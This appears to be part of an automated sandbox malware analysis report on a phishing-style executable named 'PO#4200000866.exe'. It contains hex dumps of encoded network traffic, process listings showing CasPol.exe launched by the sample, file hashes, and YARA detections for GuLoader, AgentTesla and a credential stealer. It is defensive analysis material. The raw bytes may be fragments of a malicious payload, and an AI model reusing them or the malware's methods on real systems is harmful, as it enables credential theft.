                                                                                    2022-05-11 12:51:32 UTC78INData Raw: 55 00 2c de af c7 28 f7 b5 07 78 ef 0e c2 d5 a4 ea f3 b1 15 6f c9 45 70 da 76 d5 6c 6f 05 c4 06 fe 71 45 12 93 10 6b 89 35 ef 72 2c 07 d7 d6 74 18 1b 9a 14 11 6b 4f 40 f1 5d e9 11 a9 43 7e 09 52 92 20 9d 40 78 c3 0e ec 0c d8 98 1b 85 2a 6e 75 87 19 f5 82 83 f2 29 8e 76 84 35 6e 09 c3 8e 53 98 e5 f2 f5 af 90 f1 a2 41 a0 4d d8 fe 88 2c 4f e7 40 db c0 c6 89 f8 ac 1b f3 9b e2 ed 2f b2 44 fd 0c 53 f9 54 15 52 ec e8 5a 58 a3 06 0b a5 e4 a9 37 71 4c 94 a6 f8 a1 50 47 2c bb 26 c6 84 d3 44 8a d4 79 2d c7 9f f9 73 99 06 67 62 95 aa a7 ea 78 d3 97 5d 8c ac 56 2e 10 1f 75 5b 19 3c 36 ee 46 dc e1 9f d1 28 11 e5 d6 d0 ed fb 0f f2 2b 72 14 74 7c 76 52 c0 6a 67 52 0d 87 1a f9 37 f3 35 84 a5 5f 3d 29 83 be 97 e7 87 d8 95 95 42 04 38 2f 93 a0 b6 c2 a8 a4 12 c7 12 33 3d a7
                                                                                    Data Ascii: U,(xoEpvloqEk5r,tkO@]C~R @x*nu)v5nSAM,O@/DSTRZX7qLPG,&Dy-sgbx]V.u[<6F(+rt|vRjgR75_=)B8/3=
                                                                                    2022-05-11 12:51:32 UTC86INData Raw: 14 78 7c 6e 52 c0 6a 76 6d 0e 87 10 e3 2e ef 49 f8 b6 57 24 40 e8 af 86 d5 b2 0b 96 95 55 3e 0a 3e 09 b9 ac df a8 da 1f a9 69 3b 2a 93 be 7b d4 89 0f e4 c2 ae 05 21 20 e3 78 0a 6a 13 8e 09 f3 66 f8 e4 d2 7f e0 52 ad de ac d0 19 ad 8d 4e 56 8e 37 74 f3 c0 c8 2e 9a e1 c7 c2 8b af bb 34 7a 29 f6 5c cf 18 db 11 16 17 91 5d cd 55 b6 53 19 b5 b2 d0 d0 ab 36 e8 e9 f1 5c 3e 3d c4 a6 43 52 a7 76 f0 fc 37 11 14 eb 48 c6 79 75 83 b9 0f c1 84 1c fc c8 d5 d6 f3 c6 5d 35 ed f5 ba 94 d3 07 4d 74 69 61 fa 84 dd f0 b5 74 ef 26 b3 1a 54 bd c9 0a 28 5d 06 a2 cb 96 f7 4a de d6 83 4a 82 98 23 ed 4e 87 72 f1 be 88 71 ca 7c 97 75 b6 b7 20 f0 67 ae c7 fa 10 2c 9d 49 54 22 5e a1 99 c8 9a d8 ab 82 94 12 4e 53 32 a2 75 60 6f 55 76 85 74 89 70 56 25 b1 a8 de 19 5a 3f 3c 3c b2 7e 12
                                                                                    Data Ascii: x|nRjvm.IW$@U>>i;*{! xjfRNV7t.4z)\]US6\>=CRv7Hyu]5Mtiat&T(]JJ#Nrq|u g,IT"^NS2u`oUvtpV%Z?<<~
                                                                                    2022-05-11 12:51:32 UTC94INData Raw: 45 d0 e5 00 bf c5 5a 53 23 ed b7 90 d5 70 cd af 11 85 14 55 7e b9 b1 71 75 76 48 60 8b 4d 29 6b a8 2e b5 1c d8 31 1f 2e 33 27 b0 4a bc b7 93 1d d2 5e 2f ce b1 c0 0d 02 3e 57 37 6d 7a ef bc 70 66 84 2d fd fa 55 df 0c 78 86 fd d3 95 fa ba d0 58 e6 b0 e3 ce 71 49 a4 2d 85 43 cf c7 5d ab 4b 7a 8e dc 9d 34 59 02 01 d7 d5 cb 12 9a f8 12 69 94 bb 3e ef 1f a7 e9 7c 1c 0d 56 4b fa 6a 78 bc 05 07 46 f6 5f 39 f5 d6 98 75 b5 d1 aa 42 9a 88 ba 80 37 46 23 aa ec a4 1c c7 1d 4d 69 f9 a4 be 3d 8d db bf 5e 72 b8 77 6f 29 35 29 cd d9 03 af 46 38 61 21 45 99 83 33 b4 14 f6 64 44 bc 3b cf 58 7a 7e 4b 69 1d 93 ad a5 01 bc 18 5e 80 c3 37 a5 ce 6c c3 c7 ca 2c c8 cb 73 17 e0 8e 03 7b 88 ab 14 92 3f 64 53 6a ca f6 61 33 d1 31 ec c4 48 b8 19 8e 21 4c 88 49 97 db e8 e7 ee e3 4f 21
                                                                                    Data Ascii: EZS#pU~quvH`M)k.1.3'J^/>W7mzpf-UxXqI-C]Kz4Yi>|VKjxF_9uB7F#Mi=^rwo)5)F8a!E3dD;Xz~Ki^7l,s{?dSja31H!LIO!
                                                                                    2022-05-11 12:51:32 UTC101INData Raw: 68 d2 c6 ff 1e cd e7 73 17 db f0 1d 68 89 83 eb 94 29 90 7a 83 c8 e1 74 5b ee 21 eb dd 5b 48 0b a9 23 76 86 67 95 24 3b 1b e8 f5 53 f7 cb 25 6a c9 22 91 f0 83 8c 1c 5b 69 bf 2e aa b0 e1 53 51 c5 80 ff d7 04 52 2e d3 22 5d 7f a3 76 f5 e9 d5 be 7d ee e8 74 31 24 dd 91 2a 8b 7c 26 30 4d d9 a3 5c a2 ef ed f5 b9 d4 f6 d3 36 d8 c4 e7 30 8c 4a 45 e9 90 53 07 74 cf b8 55 4d a6 85 df ed e6 08 46 85 e3 97 0b 41 c0 23 9a 2a 97 90 1c eb 0b 95 0e cd db 6e 53 11 3a f8 bb c2 53 40 bd 11 e0 83 0c d3 c9 8f c9 c3 dc 1e 77 3d 57 58 ce 76 cb e3 67 2d ec 22 e4 8f 4e 2d 90 12 4b ba 16 ef 7b 3f 27 d6 fc 54 1a 33 a1 15 01 61 62 5f eb 50 e9 56 f0 bd 6e 38 50 8a 2c 86 79 6a 3d fd c1 0e cf 5c 1b 8c 20 e3 61 a9 1b d4 8a 80 b3 5b 6e 70 97 3b 4d f4 ad 15 57 93 c7 0a 9b 33 94 fd 80 59
                                                                                    Data Ascii: hsh)zt[![H#vg$;S%j"[i.SQR."]v}t1$*|&0M\60JEStUMFA#*nS:S@w=WXvg-"N-K{?'T3ab_PVn8P,yj=\ a[np;MW3Y
                                                                                    2022-05-11 12:51:32 UTC109INData Raw: 49 79 3c b2 96 21 80 d2 6d c9 e8 f9 18 f0 c9 1b 85 31 0b ec d4 19 ff 89 bd 20 5b 8c 70 9d 1d 44 d8 87 8c 57 e8 89 09 f4 ab e2 7f 8a 5e a5 5c da c1 7c a1 57 ed 68 e6 ec 40 8d d0 85 6f d4 91 ca cf 52 f6 4f c4 bf 50 82 10 3c 4d ec f9 58 76 90 02 91 87 6b 95 33 7b e8 ad 81 ef 77 49 6b 55 be 37 c4 a9 9b ac 64 2e f5 98 ab 04 eb 63 8e 07 d0 55 94 aa a5 80 30 c3 91 c3 b3 fb 88 2c 6d 08 57 5b 1d 58 c6 6f 29 0c ea a6 9a 03 02 d5 c5 d5 d6 fd 95 da 10 76 14 63 42 5e 79 db 60 48 06 f1 86 3c e8 27 ee 26 84 a2 a9 2f 17 97 ba 8d df 9d c1 6b 94 7f 14 02 3c 22 50 bd a8 e2 ca 15 c2 9c 8e 00 99 c5 14 e6 8a 05 b9 81 ac 05 23 33 e8 78 17 72 2d c3 1a e0 49 3e e4 fe 7d e9 4c bc cd 2f 3d 15 90 84 4b 70 bc 9b 74 f4 d2 59 ee b6 ec ce f9 e8 ed ba 34 6f aa 50 62 ee a6 d0 11 1b 25 95
                                                                                    Data Ascii: Iy<!m1 [pDW^\|Wh@oROP<MXvk3{wIkU7d.cU0,mW[Xo)vcB^y`H<'&/k<"P#3xr-I>}L/=KptY4oPb%
                                                                                    2022-05-11 12:51:32 UTC117INData Raw: 4b 18 e7 54 ea e5 d2 6c c1 45 bc f8 36 c3 14 b9 80 5f 4b b0 9b 5f e8 ca a0 f8 64 e0 e1 f9 8b a5 bb 33 7d da e6 7c e5 a8 d0 11 1b 27 95 5d e1 51 f2 1b 32 56 ba 83 88 ad 36 e4 bf 1a 5c 3e 31 83 fa 42 52 a7 74 7d f8 24 27 3e 11 79 c6 7f 1a cc b9 0f da 81 19 c6 dd c1 f9 b5 3a 5c 1f f9 60 b6 94 d4 10 a7 61 51 4b 75 8f dd fd b2 9a 62 5b b1 31 57 80 02 ff 53 89 0e 8e f7 af 0d 5f f6 5e 91 b4 85 aa b0 e8 66 50 71 e2 a2 b3 7c ec 6c 1b 9a b6 b7 21 5d 77 b8 c1 9b 32 a0 cc 43 5e 20 8f 80 8e dc 84 c7 bb 8e 94 12 44 7c 4c 7a 77 6a 76 57 6f a3 29 2c 70 50 40 8f 14 df 13 70 18 3b 05 cb 54 af b6 fc fc d5 47 db e3 ba c3 1c 08 79 f4 37 6d 76 fc 7c 0c 69 85 3c f0 ec a9 d8 4f a7 8d ee df a5 b3 bf d6 3a 3e a9 1d c5 32 8b 8e 93 8b 68 85 e7 5b 57 4f 70 a0 0c 8f 36 5f 20 0e d5 fe
                                                                                    Data Ascii: KTlE6_K_d3}|']Q2V6\>1BRt}$'>y:\`aQKub[1WS_^fPq|l!]w2C^ D|LzwjvWo),pP@p;TGy7mv|i<O:>2h[WOp6_
                                                                                    2022-05-11 12:51:32 UTC125INData Raw: 7e 83 4e 70 a2 1c 08 e6 ab de 00 a6 81 ee d5 91 c1 44 d1 49 e7 82 9f b1 3c 50 8c 97 a1 b0 c9 ef 73 30 6e 5d b7 45 b9 c7 5f 2a 22 f7 0e cf 18 83 f6 3d 90 84 bc 22 3b 9c f5 9e 7a 08 f7 77 a9 04 6b 7f 0e 1b 2a 57 da 20 f4 77 d6 98 55 4c cc ad 42 93 a7 5c 8b c9 41 25 3a 83 c1 35 07 1d 6d 9a 96 b2 bc a7 a2 da f9 67 59 5e 70 6f 38 12 d2 c8 27 02 94 78 d0 64 09 83 b7 01 4b fd ef f7 60 62 25 71 cf 58 ea 71 79 74 28 b4 5b b4 06 ab c6 ba a2 c0 2f a1 e1 95 d3 c0 d1 f8 4f 99 14 00 f3 8f 3d 9f 8f ab 05 0f 0c b7 40 60 e9 16 72 34 d1 00 0d d5 44 46 07 a9 0b 9e 8c 71 6d 0f 95 66 9e e7 58 f3 fa d6 75 db dc 0a f9 ac b6 3f 43 b6 41 d1 55 99 3a 5d 42 f5 92 d7 67 05 52 28 0f a4 23 0f b4 7a da f8 2c b6 65 10 73 7d 13 34 85 8c d2 8b 78 30 38 a5 d5 a3 56 b6 e7 c9 0c b0 c3 0e f8
                                                                                    Data Ascii: ~NpDI<Ps0n]E_*"=";zwk*W wULB\A%:5mgY^po8'xdK`b%qXqyt([/O=@`r4DFqmfXu?CAU:]BgR(#z,es}4x08V
                                                                                    2022-05-11 12:51:32 UTC133INData Raw: ca 53 46 d5 65 fe 9e 04 c8 0b 08 33 7b 4e 55 7b de d8 f5 ce 79 10 e9 46 16 df a2 ac 2d a1 fa 4e 79 56 db a7 76 48 f7 e1 f5 2b e6 25 c3 3c fa 3d ea 30 84 7c 3b f4 bc 51 0e 50 36 b1 4c b5 8d 2f a3 a7 e5 23 8f 8d 50 96 0b 4b 5d 1c b0 b6 06 aa 24 85 dd 95 2e 4f ed 6e 53 0e 35 e0 47 c3 a6 46 97 97 69 e2 0d c2 db a2 01 81 dc 17 f5 e6 7b 66 ed 52 3c b3 7e 20 cc 8f e2 71 4f 1e 89 2c 98 a0 1b e9 58 a4 a7 b6 d1 5e 1c 3b 7e 14 01 6b d5 65 dc 4c cf 7f 03 42 6f 14 72 53 3d 86 70 62 eb 05 ec 0c de 7b 9d fb 5a 1c 60 81 39 1a 89 ab 08 b2 ab 5d 85 17 66 16 c3 8e 55 b3 04 14 f4 af 89 f4 a2 a7 a5 4d d8 fc 28 52 2e ec 68 e3 e4 20 8e d0 8f 81 d6 bc db f2 0f 54 4f c4 bb 72 2b 48 3d 4d f5 c0 a5 71 81 00 21 2d b2 f4 32 71 4e 9c 62 f9 a1 5a f5 61 97 37 ea b7 31 53 9b d1 d7 43 cc
                                                                                    Data Ascii: SFe3{NU{yF-NyVvH+%<=0|;QP6L/#PK]$.OnS5GFi{fR<~ qO,X^;~keLBorS=pb{Z`9]fUM(R.h TOr+H=Mq!-2qNbZa71SC
                                                                                    2022-05-11 12:51:32 UTC141INData Raw: f7 b1 04 d6 2f b2 d4 e1 96 43 df 74 f3 4f e8 e8 7c 15 aa 06 0b b3 e4 6c 32 71 4c 96 07 86 c0 5b 6f 40 9a e9 ce 97 d6 c8 be fc e6 bc f0 8a e8 63 8a 20 34 25 94 aa b9 d3 84 c3 91 c1 8e 17 2c 4f 17 37 52 7b c9 34 1e d5 dc f9 c6 b4 ba 09 c1 e7 c7 d5 dc 8e be da 16 69 1d 5a ad 54 52 c6 4a cd 6f 6e 86 10 ee 1f 34 24 83 b4 cd 0b 16 84 8b a6 0e 98 d9 95 b5 2f 3d 29 3e 15 9b 46 d2 a1 cd 3f 44 6c 58 2b 99 c1 27 04 8b 05 cc 1b 89 28 3a 15 c8 bb 03 79 06 b8 98 cc 5e c0 f8 fa 86 f0 47 ba e0 b0 bd 75 bd 80 5b 7a 75 92 74 f3 50 82 c2 88 c7 ed 28 91 ae bb 14 e2 0f e7 50 f8 b1 f3 e8 1d 3f 6d 76 4b 2d b8 18 19 b1 98 2c 5e af 36 74 e4 26 4f 18 1b 7f ee 43 52 8d c9 56 f8 37 08 2a 39 b0 c7 7f 1c e3 3f 71 aa 96 12 e9 e6 14 fc a2 c4 c7 16 d6 6a 9b b4 06 04 59 60 5d e4 49 84 dd
                                                                                    Data Ascii: /CtO|l2qL[o@c 4%,O7R{4iZTRJon4$/=)>F?DlX+'(:y^Gu[zutP(P?mvK-,^6t&OCRV7*9?qjY`]I
                                                                                    2022-05-11 12:51:32 UTC148INData Raw: 35 2e b7 f2 03 61 e4 10 3c ca 04 6e 5a 6b 36 be 09 7b b0 ba 0d b9 fb 15 92 c4 c6 89 ca da 32 5a 91 1d a1 f1 b7 63 3c 0e 7d 74 59 4a 19 25 70 ea 89 a3 6a dd 98 6f 25 3f af ba db 51 22 5a 2e 94 20 85 56 c8 07 00 2f 6c c9 03 f6 45 13 21 de 62 c8 a7 99 04 04 8c e3 c0 0f 64 4d aa 0b 64 e0 fa 8c 50 1d 2d 7f 2e 6d 46 ee 68 e2 c3 f1 82 2f eb d7 f5 c5 ea 1d ce ac f3 f4 a7 19 81 41 8f d1 a2 85 b5 25 ca 28 29 16 83 67 df 41 68 33 6d b6 be 89 5e 98 c4 de 43 02 f6 cf 24 89 61 48 07 6f 9b cf 27 5a 64 3a 4d 03 74 db 59 18 5a 81 1b 0c eb f9 82 2b 8f ab 36 d7 2e 38 ef 2b cc 61 47 55 75 84 8c 8f 76 f1 ab 54 33 d7 d4 50 6b 65 ef 93 55 46 8f 2a 33 6e 08 1f e6 50 6c 2d c6 48 6d 1e b8 e8 1b c7 8c ce 3e ef ed db f2 f2 48 1c b5 c8 8f 2b 1b 18 4a 2c b5 bc b7 2a 96 e6 f7 48 5d 82
                                                                                    Data Ascii: 5.a<nZk6{2Zc<}tYJ%pjo%?Q"Z. V/lE!bdMdP-.mFh/A%()gAh3m^C$aHo'Zd:MtYZ+6.8+aGUuvT3PkeUF*3nPl-Hm>H+J,*H]
                                                                                    2022-05-11 12:51:32 UTC156INData Raw: 56 5d 04 a7 7d 57 3f 1a 46 05 00 f6 77 d4 98 75 ae 01 ac 42 8b 92 a5 73 c9 45 0e ba fd a0 34 aa 1f 4d 6f 8b b2 47 3d 8b f6 ea 41 79 ab 9d 6e 38 32 2b c6 dc 02 90 51 2b 65 09 85 7d 85 35 9c f3 f7 9f 42 c4 70 cd 59 70 54 97 64 0e 94 80 b6 fd ab ff 5e ae c0 2f b6 88 6e d2 c0 ca d2 cb e6 6c 00 f1 8b 1d 68 d1 ac 05 95 34 9a 54 47 ea e0 70 34 d1 20 93 d9 44 46 05 a2 2d 66 a4 70 69 25 17 18 8c ef 58 f7 c7 2e 7a da f2 91 de 80 a7 19 c1 4c 41 d1 78 bb de 52 79 f4 87 fe 9e 04 12 3c 25 22 70 6c a8 7b e5 d9 d5 b7 65 10 61 4a fd 27 be ac 05 8a 43 31 1d 56 db a3 95 a8 f6 e1 e8 b1 ed 09 e9 1b d8 dc eb 30 77 5c bb e8 a1 51 22 79 8b b1 49 b3 b7 a9 30 c7 e4 23 96 ad 87 96 4e 4a c2 38 9d a4 c0 8c c6 84 c0 95 37 c6 bf 6f 56 10 29 c8 ff c0 a6 40 a0 11 2e 82 58 c3 da 82 e2 80
                                                                                    Data Ascii: V]}W?FwuBsE4MoG=Ayn82+Q+e}5BpYpTd^/nlh4TGp4 DF-fpi%X.zLAxRy<%"pl{eaJ'C1V0w\Q"yI0#NJ87oV)@.X
                                                                                    2022-05-11 12:51:32 UTC164INData Raw: b3 a7 a9 ce c6 60 27 93 b6 f5 97 23 09 c6 39 9d a4 33 8a 7e 99 c5 8e 49 c7 6d 2b 52 11 29 c8 ad c2 65 41 97 13 50 83 18 84 de 82 e2 80 cf 17 c1 c7 4e 6f 8c 72 e3 fb 7f 20 ec 2b ed 71 ad 1c 8c 1f 26 a1 f3 a4 73 26 d9 d7 c3 5e c0 1f 82 0e 46 6b 43 0d f0 5d a1 5f f4 43 02 35 4a 89 66 86 08 32 c2 fc ed 0c cb 51 12 80 23 06 27 85 59 ae 89 ab 08 28 9d 70 0d 17 5e e8 85 8e 21 c1 cc 08 f4 af 85 fd b9 5b bc 56 99 d6 d2 78 4e ed 68 e7 d7 c6 5b fa 97 00 b4 91 2e 81 2e b2 4e c4 a8 52 54 52 17 4f af e8 38 26 80 06 0b af df 95 6e 74 52 a7 c2 f8 39 02 6e 44 ba 26 df 97 3b 53 b1 d3 b0 9a 4c 1c eb 63 8a 00 4c 0e 6a 80 bf e0 3a c2 e1 9c a5 91 52 2e 05 37 c3 5e 01 2d 59 d5 da 80 ea a6 9c 29 02 e5 ef fe e4 e6 d2 da 86 16 15 72 54 55 41 c0 ad 4a 09 14 c0 10 1a 5a e4 26 83 b4
                                                                                    Data Ascii: `'#93~Im+R)eAPNor +q&s&^FkC]_C5Jf2Q#'Y(p^![VxNh[..NRTRO8&ntR9nD&;SLcLj:R.7^-Y)rTUAJZ&
                                                                                    2022-05-11 12:51:32 UTC172INData Raw: 92 67 2c 46 37 2b 70 1b 36 1e d5 d0 dc 22 b3 a9 2b 41 e5 59 fe fe fd 95 da 80 76 c9 71 61 57 02 c0 a0 64 13 0f 87 10 7c 3f 7a 31 b6 b6 07 2e d9 be af 86 df 9a 4f 95 92 57 23 2b 6e 09 b7 93 d1 a1 cb 15 50 12 d7 32 ac c7 57 d6 ac 29 ce 81 ac 05 bd 33 d9 6d 34 7b 56 98 5d cb 5c c0 e5 d2 e9 f1 f6 a0 ff 34 93 14 d5 ac 5d 5a a6 90 e2 f3 af a3 da 98 b1 cd 70 bf ac bb 34 6b b2 e7 df fa 8a d9 41 1c 92 47 5e cd 53 d9 8f 19 3a bc cd 5e ff 36 21 ed 09 5d 3e 3b 3d ec 80 4f 98 5c 2d f8 c7 3b 3e 11 49 c6 e9 1a 70 bd 3a c9 c7 12 fc eb c3 fe a2 c4 cb 33 16 65 88 96 83 06 6a 4d 7f 49 62 84 4b fa 40 60 56 75 e3 1a 00 86 e3 fd 28 5d 9a 8e 85 a6 cc 5c a6 58 f0 67 86 80 ae ea d8 87 67 e7 9d 9b 37 dc f3 36 26 b6 b7 21 c4 76 1d f6 d0 02 f0 cc f2 79 21 fc b0 8f 4a 8e f2 86 2f 96
                                                                                    Data Ascii: g,F7+p6"+AYvqaWd|?z1.OW#+nP2W)3m4{V]\4]Zp4kAG^S:^6!]>;=O\-;>Ip:3ejMIbK@`Vu(]\Xgg76&!vy!J/
                                                                                    2022-05-11 12:51:32 UTC180INData Raw: 95 30 4a f7 5e ad 6b 54 94 b7 ec c6 92 a5 f6 59 9c 72 fd 79 1b 25 b0 16 0d a3 75 29 d1 b6 11 5b d8 68 52 a1 d1 b3 87 40 8e d9 a2 09 94 c3 41 6e 02 b1 75 b3 79 4e 46 98 5c a7 73 ae 3e b7 17 43 19 e3 2b ba 38 ac 52 28 9d 3a 19 8c 46 70 ec c1 c1 52 01 1a fe bd 61 4d e2 b3 42 a1 84 0d fc 8c bf 5a 25 47 89 fb f4 9b e9 fc d6 5c c0 bb 1d ce 5b 6b ad 43 95 42 cf ed 6d b9 4b f9 a5 61 87 27 5f bb 23 c1 c6 9d 12 ca ed 00 48 45 bc 75 17 0b aa ec 7b c9 f3 06 78 b1 7d fe 96 c7 20 fc ea a4 00 47 ff b6 74 0a c2 f0 5a dd 84 01 8a 76 40 a0 bb 59 a0 21 26 0a 4d be 97 0a 9a 97 90 26 e9 2b 6d 85 71 be 39 8e 27 74 30 a6 83 ad 09 f0 0a 29 9d 84 1c 0c ee 5b 64 34 f9 c4 cc 01 74 23 70 41 0f bd ab 15 2a 5a e5 d6 af d0 3b 60 dd 65 d3 85 f0 18 cc e6 74 52 e2 be 05 49 8b af 1c 83 2b
                                                                                    Data Ascii: 0J^kTYry%u)[hR@AnuyNF\s>C+8R(:FpRaMBZ%G\[kCBmKa'_#HEu{x} GtZv@Y!&M&+mq9't0)[d4t#pA*Z;`etRI+
                                                                                    2022-05-11 12:51:32 UTC187INData Raw: 58 d4 8f 99 00 2e b6 71 a7 39 1e 30 38 00 0e c6 c8 d7 72 ca 88 38 c0 a5 2f f2 a6 1b bc ac b8 b3 ad a1 1c 6d 96 8b 59 0d e3 ce 71 f0 6f f3 3e 23 c9 a2 1d 5a a2 4f 87 be 44 21 7d d6 7c 2a ec 18 05 68 78 7c 8a 8a 3d f7 8a 5c 1a b8 b9 e3 af cc c8 7d 16 22 24 d1 26 dc bf 0c 0c 94 e8 9a 9e 63 37 5a 7a 64 34 02 d0 34 bf b5 b0 b6 16 75 9d 07 78 4f cf c9 65 ea 15 55 18 10 be d7 04 c8 98 85 9a dc 85 61 be 7f 94 bd 86 55 84 1b de 9c e8 34 7d 08 89 d9 20 d6 e9 c8 b0 a3 e4 64 ee d9 f4 fe 67 2e 89 58 f0 c1 20 ed a3 f0 82 d8 61 a3 84 02 36 5f 48 a5 db c2 c1 25 c9 4e 58 d0 4a b7 b3 ee ac e1 b1 72 6f a4 33 00 94 34 aa de 12 6e 8d 46 9b 71 28 64 e0 5b 34 d2 7e 9d 3c 47 b4 b2 d0 39 7d 6f c5 56 6e 06 3f 35 85 38 9b 11 86 2e 0a 14 35 f7 55 d9 20 0e ac 9f 88 7f ab 1f 7a e8 5e
                                                                                    Data Ascii: X.q908r8/mYqo>#ZOD!}|*hx|=\}"$&c7Zzd44uxOeUaU4} dg.X a6_H%NXJro34nFq(d[4~<G9}oVn?58.5U z^
                                                                                    2022-05-11 12:51:32 UTC195INData Raw: 10 48 fa 6a 04 d3 4f 8a 0a 52 d9 90 b5 2a 4c 7e e2 61 01 2c 2a 34 a6 34 87 3b 88 34 3b 71 2a e6 21 c4 05 7c 80 89 ed 48 ad 51 5e f0 3b 5b 15 85 5e 8a 88 e3 7d 28 ef 05 97 53 33 f3 a1 fb 55 f7 b8 08 91 da 96 9b ff 5e c3 38 de 94 dc 2c 0c 9b 68 a3 b2 c6 ca a6 8f 5d 85 91 8d a2 2f fa 38 c4 da 24 f9 36 4b 4d 8b 9e 5c 14 f7 06 6e d9 cc f3 45 71 2d ca 85 ba d6 5a 2c 33 ba 62 bb 97 93 25 9b 97 80 9a 97 32 ea 02 fd 00 3d 79 94 c9 d0 fb 19 b5 91 a2 d3 91 34 59 16 50 21 5b 7e 53 6a 8a 08 b3 9c a6 db 4c 65 a3 a8 a7 99 9a e7 b5 63 18 70 25 3d 3b 36 af 17 4f 5f 6e f3 79 9c 5a b2 4f ed d0 38 59 3b e6 c8 f2 80 d9 ab f0 f4 27 73 67 51 5e da d1 b7 ce bc 15 84 6a 39 69 e1 c5 43 ae 89 51 a3 d4 c2 6c 48 5c 8c 0c 44 01 06 df 7f 93 13 af 81 a7 13 94 01 d5 a6 53 8d 75 d1 e5 1a
                                                                                    Data Ascii: HjOR*L~a,*44;4;q*!|HQ^;[^}(S3U^8,h]/8$6KM\nEq-Z,3b%2=y4YP![~SjLecp%=;6O_nyZO8Y;'sgQ^j9iCQlH\DSu
                                                                                    2022-05-11 12:51:32 UTC203INData Raw: bf bc dd af c9 1d d3 00 bb e7 98 d7 86 de 85 02 ce 94 be 85 f6 32 fa e8 09 6b 73 92 1a e7 4b d2 65 0f 7e e3 c6 b4 dc 31 c7 01 ae 00 82 5b b4 11 7c e6 d8 27 32 9b f3 4c f3 81 db a9 41 31 23 ca 45 f5 3f 06 10 0e be 63 49 df d3 04 18 0b 34 b0 e0 40 b3 2a f2 d3 3e 55 26 2e b9 6e a6 50 bc dc e8 f6 3f 0f 2d 93 dc da 67 12 d1 b7 07 d7 8b 0e e3 da d9 e6 b0 47 18 2b e9 fb f8 8c cb 14 da 25 6f c8 6a 95 5f 6f b8 e7 26 79 bd 08 d6 ee f3 88 3a 28 1d 0c 68 8f f1 46 f3 58 87 58 07 c9 ab ca 4e 95 f0 af a1 8c 75 5e 8f 19 35 34 22 2f 54 56 b9 c2 66 45 ae c8 69 55 3f e0 bf 88 d9 9b de 03 c7 95 00 c5 73 2d ac 7b 78 09 57 67 89 49 3c f0 8b 2e 8b 97 d7 17 52 3e 34 2a a8 44 2f 6d 92 1e 54 4f cd c1 93 d9 7e 08 0b fd 3f 6d 7f f9 a8 6d 6f 95 bf af c8 ac cf 35 6c 0f 33 d4 9a 68 b5
                                                                                    Data Ascii: 2ksKe~1[|'2LA1#E?cI4@*>U&.nP?-gG+%oj_o&y:(hFXXNu^54"/TVfEiU?s-{xWgI<.R>4*D/mTO~?mmo5l3h


                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:1
                                                                                    Start time:14:50:51
                                                                                    Start date:11/05/2022
                                                                                    Path:C:\Users\user\Desktop\PO#4200000866.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\PO#4200000866.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:379352 bytes
                                                                                    MD5 hash:5D0444B70FF5CAA4EC3B2CA2E563E724
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low

                                                                                    Target ID:7
                                                                                    Start time:14:51:14
                                                                                    Start date:11/05/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\PO#4200000866.exe"
                                                                                    Imagebase:0x1c0000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Target ID:8
                                                                                    Start time:14:51:14
                                                                                    Start date:11/05/2022
                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\PO#4200000866.exe"
                                                                                    Imagebase:0xd40000
                                                                                    File size:108664 bytes
                                                                                    MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:moderate

                                                                                    Target ID:9
                                                                                    Start time:14:51:14
                                                                                    Start date:11/05/2022
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7cd350000
                                                                                    File size:875008 bytes
                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:4.1%
                                                                                      Dynamic/Decrypted Code Coverage:6.6%
                                                                                      Signature Coverage:23%
                                                                                      Total number of Nodes:958
                                                                                      Total number of Limit Nodes:40
